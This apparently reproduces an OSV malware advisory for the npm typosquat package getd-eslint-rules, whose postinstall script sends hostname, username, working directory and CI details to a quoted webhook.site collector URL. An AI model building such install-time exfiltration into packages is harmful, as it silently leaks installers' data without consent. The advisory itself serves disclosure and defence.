getd-eslint-rules @0.0.1
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-5466
Ecosystem
npm
Summary
On npm install , postinstall.js collects host identifiers (os.hostname, os.userInfo username, os.platform, current working directory, CI environment variable, and package name/version) and sends them as query-string parameters in an HTTPS GET to a hardcoded webhook.site collector URL (postinstall.js line 18: https://webhook.site/18dc4281-d366-438a-9186-76fbcd56ade5?pkg=...&host=...&user=...&platform=...&cwd=...&ci=... ). The fetch fires automatically on install and errors are silently swallowed. The package self-describes as a 'defensive typo-squat' research artifact, but installer-side identifiers are exfiltrated to a third-party request collector without consent regardless of stated intent. The package name pattern targets users who mistype an ESLint rules package, increasing the chance of unintended installation.
Source: amazon-inspector (17328047b2ec8dce82cfbdfd5b16c8f862d51dca26b02c9801587c220a48975a)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.